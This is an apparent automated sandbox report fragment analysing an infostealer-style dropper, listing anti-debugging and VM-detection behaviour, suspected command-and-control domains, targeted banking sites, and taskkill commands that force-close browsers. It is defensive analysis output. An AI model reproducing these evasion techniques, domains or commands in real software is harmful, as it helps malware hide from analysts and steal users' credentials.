Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2460 Thread sleep time: -9960000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4708 Thread sleep count: 64 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4708 Thread sleep time: -128064s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6020 Thread sleep count: 2604 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6020 Thread sleep time: -5210604s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3224 Thread sleep count: 65 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3224 Thread sleep time: -130065s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5248 Thread sleep count: 2805 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5248 Thread sleep time: -5612805s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5572 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2408 Thread sleep count: 2793 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2408 Thread sleep time: -5588793s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2408 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5248 Thread sleep time: -56028s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe TID: 1576 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe TID: 3292 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe TID: 1984 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe TID: 2292 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe TID: 5804 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe TID: 4432 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe TID: 5812 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe TID: 2216 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe TID: 5608 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Thread delayed: delay time: 922337203685477
Source: num.exe, 00000024.00000002.3084290708.0000000000D47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: firefox.exe, 0000001C.00000002.2997654376.0000016C6FDAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWz
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A5E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 996773cd54.exe, 0000000A.00000002.2813065067.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, 996773cd54.exe, 0000000A.00000002.2813065067.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2999480700.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2973927647.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2979596133.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2958108070.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2933392825.0000000001064000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001A.00000002.2876974078.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3009366303.0000016C70740000.00000004.00000020.00020000.00000000.sdmp, 996773cd54.exe, 0000001D.00000002.3000201409.00000000006EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000019.00000002.3015823343.0000025E7C9C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3007808138.0000016C70317000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 996773cd54.exe, 0000001D.00000002.3000201409.000000000067B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware3
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: num.exe, 00000024.00000002.3084290708.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWeg
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: firefox.exe, 00000019.00000002.3011428041.0000025E72C70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW^<
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A5E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: firefox.exe, 0000001C.00000002.3009366303.0000016C70740000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW"{Z:
Source: num.exe, 00000024.00000002.3084290708.0000000000D47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: firefox.exe, 0000001E.00000002.3004734211.000001CB32300000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: num.exe, 0000001A.00000002.2876974078.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8F
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: skotes.exe, skotes.exe, 00000006.00000002.2366078572.00000000006C8000.00000040.00000001.01000000.0000000B.sdmp, 996773cd54.exe, 0000000A.00000002.2820727012.0000000001140000.00000040.00000001.01000000.0000000E.sdmp, 996773cd54.exe, 0000001D.00000002.3007190429.0000000001140000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: R4UI5PZ4W045Z6XA.exe, 00000004.00000003.2296782512.0000000001630000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: firefox.exe, 00000019.00000002.3011428041.0000025E72C70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: num.exe, 0000001A.00000002.2876974078.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarez
Source: firefox.exe, 0000001C.00000002.3009366303.0000016C70740000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJz
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: firefox.exe, 0000001C.00000002.2997654376.0000016C6FDAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@(
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: firefox.exe, 00000019.00000002.3011428041.0000025E72CB2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2997654376.0000016C6FDAA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3009366303.0000016C70740000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3004734211.000001CB32300000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 996773cd54.exe, 0000001D.00000002.3000201409.00000000006BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh#o%SystemRoot%\system32\mswsock.dll
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 996773cd54.exe, 0000000A.00000002.2813065067.0000000000A35000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: CT1ROX8L8OCI432H.exe, 00000003.00000002.2413206358.0000000000446000.00000040.00000001.01000000.00000006.sdmp, R4UI5PZ4W045Z6XA.exe, 00000004.00000002.2329050302.0000000000948000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2350034023.00000000006C8000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000006.00000002.2366078572.00000000006C8000.00000040.00000001.01000000.0000000B.sdmp, 996773cd54.exe, 0000000A.00000002.2820727012.0000000001140000.00000040.00000001.01000000.0000000E.sdmp, 996773cd54.exe, 0000001D.00000002.3007190429.0000000001140000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 21024c5511.exe, 0000000E.00000003.2999480700.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2973927647.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2979596133.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2958108070.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2933392825.0000000001064000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWWA
Source: 21024c5511.exe, 0000000E.00000003.2888487877.0000000005A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Code function: 3_2_00442177 rdtsc 3_2_00442177
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Code function: 3_2_002CB7C6 LdrInitializeThunk, 3_2_002CB7C6
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: 996773cd54.exe PID: 5644, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 996773cd54.exe PID: 3960, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 5680, type: MEMORYSTR
Source: file.exe, 00000000.00000003.2042743399.00000000053A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.2042743399.00000000053A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.2042743399.00000000053A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.2042743399.00000000053A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.2042743399.00000000053A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.2042743399.00000000053A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.2042743399.00000000053A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.2042743399.00000000053A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe "C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe "C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe "C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003096001\num.exe "C:\Users\user\AppData\Local\Temp\1003096001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
